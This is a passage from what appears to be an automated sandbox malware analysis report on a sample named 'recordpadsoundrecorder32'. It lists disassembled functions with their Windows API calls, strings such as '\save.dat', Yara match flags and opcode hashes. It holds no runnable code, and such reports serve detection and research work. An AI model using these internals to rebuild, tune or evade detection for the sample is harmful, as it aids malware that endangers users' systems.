                                                                                      • std::exception::exception.LIBCMT ref: 026037D9
                                                                                        • Part of subcall function 02612483: std::exception::_Copy_str.LIBCMT ref: 0261249C
                                                                                        • Part of subcall function 0260A4D6: __EH_prolog.LIBCMT ref: 0260A4DB
                                                                                        • Part of subcall function 0260A4D6: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 0260A4EA
                                                                                        • Part of subcall function 0260A4D6: __CxxThrowException@8.LIBCMT ref: 0260A509
                                                                                      Strings
                                                                                      • could not convert calendar time to UTC time, xrefs: 026037CE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                      • String ID: could not convert calendar time to UTC time
                                                                                      • API String ID: 1963798777-2088861013
                                                                                      • Opcode ID: c7dd616f1cfc4e3a9897583f6ca9eba73d4492cf9e834f2c287befe00ecfea45
                                                                                      • Instruction ID: 71e3c6d37d511d529ac2e362dfdfc1e75fd755046bb8430b6bf8474461082ce0
                                                                                      • Opcode Fuzzy Hash: c7dd616f1cfc4e3a9897583f6ca9eba73d4492cf9e834f2c287befe00ecfea45
                                                                                      • Instruction Fuzzy Hash: 9FE06DB5D0062A9BCB14EF90DA547AFB7B9FB04304F408599DC11A2680EB3456199E98
                                                                                      Function 0040319A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,00402EAA), ref: 0040319F
                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 004031AF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                      • API String ID: 1646373207-3105848591
                                                                                      • Opcode ID: 748c3a06171c204e9a1fd50ae91f73f3c4da2d806122e1fde3641ea021038800
                                                                                      • Instruction ID: 8ffc782c345fbc4a568335a89d7931e33654b4b0dba7f91db9b0a41dc5523864
                                                                                      • Opcode Fuzzy Hash: 748c3a06171c204e9a1fd50ae91f73f3c4da2d806122e1fde3641ea021038800
                                                                                      • Instruction Fuzzy Hash: 25C08C70381B01A6EE602FB22F09B172C0C1B48B43F1800BE7A89F81C0CE7CC208813D
                                                                                      Function 00404C5C Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,0040407A), ref: 00404C7D
                                                                                      • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,0040407A), ref: 00404CA1
                                                                                      • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,0040407A), ref: 00404CBB
                                                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,0040407A), ref: 00404D7C
                                                                                      • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,0040407A), ref: 00404D93
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual$FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 714016831-0
                                                                                      • Opcode ID: 5cad5202a8731f25dba6dd4aaf0d633060e84280589fe69eb585605416c69a03
                                                                                      • Instruction ID: 2da35cf39901cd0166ef30884cd3fae4f1f30d489fd3d975fdb0eff0fbde1f7b
                                                                                      • Opcode Fuzzy Hash: 5cad5202a8731f25dba6dd4aaf0d633060e84280589fe69eb585605416c69a03
                                                                                      • Instruction Fuzzy Hash: 5531E2B15017019BE3208F28EE44B22B7A4EBC8754F11863EEA55B73E1E778AC44CB5C
                                                                                      Function 0040447E Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 265memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • VirtualFree.KERNEL32(?,00008000,00004000,7591DFF0,?,00000000), ref: 004046D6
                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00404731
                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 00404743
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$Virtual$Heap
                                                                                      • String ID: t/@
                                                                                      • API String ID: 2016334554-3363397731
                                                                                      • Opcode ID: 3ffb46cc47d32c3f8fdb2cc0b40f733643667e7721e671ee35378e11fae462b1
                                                                                      • Instruction ID: 8d17195ec0ccff2424cf6b57804f20dfeb37273885bc82fd82189131503ce94b
                                                                                      • Opcode Fuzzy Hash: 3ffb46cc47d32c3f8fdb2cc0b40f733643667e7721e671ee35378e11fae462b1
                                                                                      • Instruction Fuzzy Hash: 3EB19EB4A01205DFDB14CF44CAD0A69BBA1FB88314F25C1AEDA596F3A2D735ED41CB84
                                                                                      Function 0261C399 Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AdjustPointer_memmove
                                                                                      • String ID:
                                                                                      • API String ID: 1721217611-0
                                                                                      • Opcode ID: 91063aebefb4cfaa101b633f1eab985e61e70b581db88f8a7cb25c4601122310
                                                                                      • Instruction ID: 359b60514a0862e0507ce8830d00ddd1aa2fb743199ed6b0d63bb4c2114f43bb
                                                                                      • Opcode Fuzzy Hash: 91063aebefb4cfaa101b633f1eab985e61e70b581db88f8a7cb25c4601122310
                                                                                      • Instruction Fuzzy Hash: 784159B56887079EEB289E25E851B7E33E99F01364F1C409FE8459A2D0EB31F190CE57
                                                                                      Function 026112D0 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02604149), ref: 0261136F
                                                                                        • Part of subcall function 02603FDC: __EH_prolog.LIBCMT ref: 02603FE1
                                                                                        • Part of subcall function 02603FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02603FF3
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02611364
                                                                                      • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02604149), ref: 026113B0
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02604149), ref: 02611481
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$Event$CreateH_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 2825413587-0
                                                                                      • Opcode ID: 82e36fd8061d3c7307d3a5a1e9c52b98d61dc8290c5a8c19a8cb4278ce000534
                                                                                      • Instruction ID: f29e1ff5d173a12295f0d53b4dc40e06520376f237b248b3b90e81cb2dbf90cd
                                                                                      • Opcode Fuzzy Hash: 82e36fd8061d3c7307d3a5a1e9c52b98d61dc8290c5a8c19a8cb4278ce000534
                                                                                      • Instruction Fuzzy Hash: 4551FFB16007458BDF20CF28C884B5ABBE4FF49328F190668E96D97380D735E805CB95
                                                                                      Function 0261375D Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                      • String ID:
                                                                                      • API String ID: 2782032738-0
                                                                                      • Opcode ID: 535039d8e7933aaddd12432e96c3b7a4be113f1a95e655b1b9895bf12f0f7668
                                                                                      • Instruction ID: 7fcef3040e1de7dec79686efc17fc068f5fd9bf08b85eab132b6ce4577dc9397
                                                                                      • Opcode Fuzzy Hash: 535039d8e7933aaddd12432e96c3b7a4be113f1a95e655b1b9895bf12f0f7668
                                                                                      • Instruction Fuzzy Hash: 9F41B575B007069BDF588FA9C8905AEBBA6EF84364B1C81BDE417C7390D770F9618B44
                                                                                      Function 0261FEC5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0261FEFB
                                                                                      • __isleadbyte_l.LIBCMT ref: 0261FF29
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 0261FF57
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 0261FF8D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                      • String ID:
                                                                                      • API String ID: 3058430110-0
                                                                                      • Opcode ID: f8a9889000c0f0233ca1d13aa040843ebe7fe52556c584570ae06de2f6be3cb4
                                                                                      • Instruction ID: ec62f718f2dafcbaf602ed8e849ba55314b9750f9cbdb16db2d6bf2c5b2e8450
                                                                                      • Opcode Fuzzy Hash: f8a9889000c0f0233ca1d13aa040843ebe7fe52556c584570ae06de2f6be3cb4
                                                                                      • Instruction Fuzzy Hash: 4C31D031600346AFDB218F75C848BAABBA9FF42314F1D4429F814876A1EB70F861CB90
                                                                                      Function 02603D7E Relevance: 6.1, APIs: 4, Instructions: 57networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • htons.WS2_32(?), ref: 02603DA2
                                                                                        • Part of subcall function 02603BD3: __EH_prolog.LIBCMT ref: 02603BD8
                                                                                        • Part of subcall function 02603BD3: std::bad_exception::bad_exception.LIBCMT ref: 02603BED
                                                                                      • htonl.WS2_32(00000000), ref: 02603DB9
                                                                                      • htonl.WS2_32(00000000), ref: 02603DC0
                                                                                      • htons.WS2_32(?), ref: 02603DD4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                                                      • String ID:
                                                                                      • API String ID: 3882411702-0
                                                                                      • Opcode ID: 66245b58193775e3fa5e49f685f17726f5af5f9655d2be14a1fa844d923e6673
                                                                                      • Instruction ID: 7dd1ad85be402a5875e1db05a26487dec4a7e150346cbefbd925561e78665456
                                                                                      • Opcode Fuzzy Hash: 66245b58193775e3fa5e49f685f17726f5af5f9655d2be14a1fa844d923e6673
                                                                                      • Instruction Fuzzy Hash: C911C235900209EFCF119F64D885E5AB7B9EF09311F01849AFC04DF284D7719A64CBA5
                                                                                      Function 0260239D Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 026023D0
                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 026023DE
                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 02602401
                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 02602408
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                      • String ID:
                                                                                      • API String ID: 4018804020-0
                                                                                      • Opcode ID: 01d4c992d574497c5f1cc9c24c81df327410390fa4aec73b72e428a970ad32b1
                                                                                      • Instruction ID: cb87a28987e75ad3adf531eeaab1c052b3a664a6b5c58870d5fe2662bfddf6ff
                                                                                      • Opcode Fuzzy Hash: 01d4c992d574497c5f1cc9c24c81df327410390fa4aec73b72e428a970ad32b1
                                                                                      • Instruction Fuzzy Hash: 9411CE71600304ABDB299F60D8C8F6BBBB9FF50708F10446DEA019B280D7B1F959DBA0
                                                                                      Function 0261C7EB Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                      • String ID:
                                                                                      • API String ID: 3016257755-0
                                                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                      • Instruction ID: e332b7ee4cba6a63c08e2498b578de637c6747f44e25dc919667fb9d4dd242ba
                                                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                                      • Instruction Fuzzy Hash: 6001803248014ABBCF526E84DC418EE3F33BB18344B08851AFA1958131C332E5B1EF82
                                                                                      Function 0260247D Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 026024A9
                                                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 026024B8
                                                                                      • InterlockedExchange.KERNEL32(?,00000001), ref: 026024CD
                                                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 026024D4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                                                      • String ID:
                                                                                      • API String ID: 4018804020-0
                                                                                      • Opcode ID: e1dbab0fe373f753051482445040e7cf39cecafb991dfea73dbbbd81b4fd37e8
                                                                                      • Instruction ID: 04280419a4dc733232a3ab855427a346ea68638534e70348cf78e88b4670d9b4
                                                                                      • Opcode Fuzzy Hash: e1dbab0fe373f753051482445040e7cf39cecafb991dfea73dbbbd81b4fd37e8
                                                                                      • Instruction Fuzzy Hash: E5F03CB2540605AFDB019F69E884F9ABBACFF45710F018419FA05CA141D771E5A88FA1
                                                                                      Function 02602004 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 02602009
                                                                                      • RtlDeleteCriticalSection.NTDLL(?), ref: 02602028
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02602037
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0260204E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                                      • String ID:
                                                                                      • API String ID: 2456309408-0
                                                                                      • Opcode ID: 5c5e860506f741b7d99bf5509e5d8ec8accf3ed6d7717f7c666f3c42e16f1e74
                                                                                      • Instruction ID: 9c253612d03944e9acb6e2859712f16c1a0db62b8aa7f3f92dd33bc6ec24353b
                                                                                      • Opcode Fuzzy Hash: 5c5e860506f741b7d99bf5509e5d8ec8accf3ed6d7717f7c666f3c42e16f1e74
                                                                                      • Instruction Fuzzy Hash: 1301ADB1400B549BC7399F54E948BAAFBB4FF04304F00495DE847826D0C774658CDF58
                                                                                      Function 02601E26 Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Event$H_prologSleep
                                                                                      • String ID:
                                                                                      • API String ID: 1765829285-0
                                                                                      • Opcode ID: eabb00f87de7dcb82c27e7895a0275b839cfb34efe004c3d4c503da58268ef2b
                                                                                      • Instruction ID: 5e63710cc876927f560f182c1428e5c9db3df4907f8bd3f5b5b5ec94e84afc3e
                                                                                      • Opcode Fuzzy Hash: eabb00f87de7dcb82c27e7895a0275b839cfb34efe004c3d4c503da58268ef2b
                                                                                      • Instruction Fuzzy Hash: 0AF0BE72640910EFCB109FA4D8C9B9CBBA0FF0C311F4081A8FA0ADB280C7349888CF65
                                                                                      Function 02609F03 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 179COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog_memmove
                                                                                      • String ID: &'
                                                                                      • API String ID: 3529519853-655172784
                                                                                      • Opcode ID: 2980cd74eb21260d6ffddcdfc78b1534982f5782034f3b5a2395794a1edbe23a
                                                                                      • Instruction ID: 295c9655ce4f2a27aa6592b63961b0ed73326ea7a85fea2858620aff25eef7c3
                                                                                      • Opcode Fuzzy Hash: 2980cd74eb21260d6ffddcdfc78b1534982f5782034f3b5a2395794a1edbe23a
                                                                                      • Instruction Fuzzy Hash: DD61AF71D00319DFDF28DFA4C980AEEBBB6AF48314F10806DD509AB281D770AA45DF65
                                                                                      Function 0040606F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(?,00000000), ref: 00406083
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3269066379.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3269066379.000000000040B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Info
                                                                                      • String ID: $
                                                                                      • API String ID: 1807457897-3032137957
                                                                                      • Opcode ID: 2bcc76b937e26bb30bc14eae63f2c8421862a1fe3dbd7d24f008297243196a7e
                                                                                      • Instruction ID: 3e87ef9e1105c78bb2f85cebc7c09ea1e0cb28c4563d123519c4b9c13c46ffd4
                                                                                      • Opcode Fuzzy Hash: 2bcc76b937e26bb30bc14eae63f2c8421862a1fe3dbd7d24f008297243196a7e
                                                                                      • Instruction Fuzzy Hash: 0C414831004258AAEB119B54CD99BFB3FE9DB06704F1501F6D587FB1D3C23949648BAE
                                                                                      Function 02609617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78networkCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02608381,?,?,00000000), ref: 0260967E
                                                                                      • getsockname.WS2_32(?,?,?), ref: 02609694
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLastgetsockname
                                                                                      • String ID: &'
                                                                                      • API String ID: 566540725-655172784
                                                                                      • Opcode ID: a4169ce1897f219981dd51bc0282bd55a0821687b0797ec9e77001cddd93c207
                                                                                      • Instruction ID: a8f76e393addacf4f62bd4f890ba074e5616a5ec61c009e768fe3ddd3151dafe
                                                                                      • Opcode Fuzzy Hash: a4169ce1897f219981dd51bc0282bd55a0821687b0797ec9e77001cddd93c207
                                                                                      • Instruction Fuzzy Hash: 06218371A112089BDB14DFA8D844ACFF7F5FF48310F11856AE919EB281D730A9458B54
                                                                                      Function 0260CC5D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0260CC62
                                                                                        • Part of subcall function 0260D23E: std::exception::exception.LIBCMT ref: 0260D26D
                                                                                        • Part of subcall function 0260D9F4: __EH_prolog.LIBCMT ref: 0260D9F9
                                                                                        • Part of subcall function 02613AFC: _malloc.LIBCMT ref: 02613B14
                                                                                        • Part of subcall function 0260D29D: __EH_prolog.LIBCMT ref: 0260D2A2
                                                                                      Strings
                                                                                      • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 0260CC98
                                                                                      • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 0260CC9F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog$_mallocstd::exception::exception
                                                                                      • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                                      • API String ID: 1953324306-1943798000
                                                                                      • Opcode ID: f02bb120b6e7b1485ed441df2e726456ce12916185ee604e0eb73371dd4ff20f
                                                                                      • Instruction ID: 9f3de7eeab0c5d8c237c4f2b0b65c191a766296b494867c8c4c50ebc89dcbc1d
                                                                                      • Opcode Fuzzy Hash: f02bb120b6e7b1485ed441df2e726456ce12916185ee604e0eb73371dd4ff20f
                                                                                      • Instruction Fuzzy Hash: 062191B1E00258AADB08EFE8D9946AEFBB5EF54700F14419DE805A73C0DB709A44DF59
                                                                                      Function 0260CD52 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0260CD57
                                                                                        • Part of subcall function 0260D315: std::exception::exception.LIBCMT ref: 0260D342
                                                                                        • Part of subcall function 0260DB2B: __EH_prolog.LIBCMT ref: 0260DB30
                                                                                        • Part of subcall function 02613AFC: _malloc.LIBCMT ref: 02613B14
                                                                                        • Part of subcall function 0260D372: __EH_prolog.LIBCMT ref: 0260D377
                                                                                      Strings
                                                                                      • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 0260CD8D
                                                                                      • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 0260CD94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: H_prolog$_mallocstd::exception::exception
                                                                                      • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                                      • API String ID: 1953324306-412195191
                                                                                      • Opcode ID: e9adca43e6ef82113b28171567df652aa5adcd77329f3200fc7d495f55487af4
                                                                                      • Instruction ID: 2b5240cbc4f6751e8dc2a4b9fca1b5bb8b06caf02d7f79ac076f361bd9844b6c
                                                                                      • Opcode Fuzzy Hash: e9adca43e6ef82113b28171567df652aa5adcd77329f3200fc7d495f55487af4
                                                                                      • Instruction Fuzzy Hash: 0B21B1B1E002149ADB18EFE4D984AEEBBB5EF04304F14419DE805A73C0DBB05A44DF98
                                                                                      Function 0260534D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 0260535D
                                                                                        • Part of subcall function 02612F5C: __FF_MSGBANNER.LIBCMT ref: 02612F73
                                                                                        • Part of subcall function 02612F5C: __NMSG_WRITE.LIBCMT ref: 02612F7A
                                                                                        • Part of subcall function 02612F5C: RtlAllocateHeap.NTDLL(00870000,00000000,00000001), ref: 02612F9F
                                                                                      • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 0260536F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3270097670.0000000002601000.00000040.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_2601000_recordpadsoundrecorder32.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                                      • String ID: \save.dat
                                                                                      • API String ID: 4128168839-3580179773
                                                                                      • Opcode ID: 60a608b3313670dd4b6d251503f343d2fdad937a2c898402072cbdb3bca66f5f
                                                                                      • Instruction ID: b350d139643547a7a2ac8762bc9e2617d54bab3e1e732f1cfe73c7b49495021b
                                                                                      • Opcode Fuzzy Hash: 60a608b3313670dd4b6d251503f343d2fdad937a2c898402072cbdb3bca66f5f
                                                                                      • Instruction Fuzzy Hash: 7F1190329042546BDB29CE658CC4E5FFF6BEF82654B1441ECE84667341EBA21D06DAA0
                                                                                      Function 02603965 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0260396A
                                                                                      • std::runtime_error::runtime_error.LIBCPMT ref: 026039C1
                                                                                        • Part of subcall function 02601410: std::exception::exception.LIBCMT ref: 02601428
                                                                                        • Part of subcall function 0260A5CC: __EH_prolog.LIBCMT ref: 0260A5D1
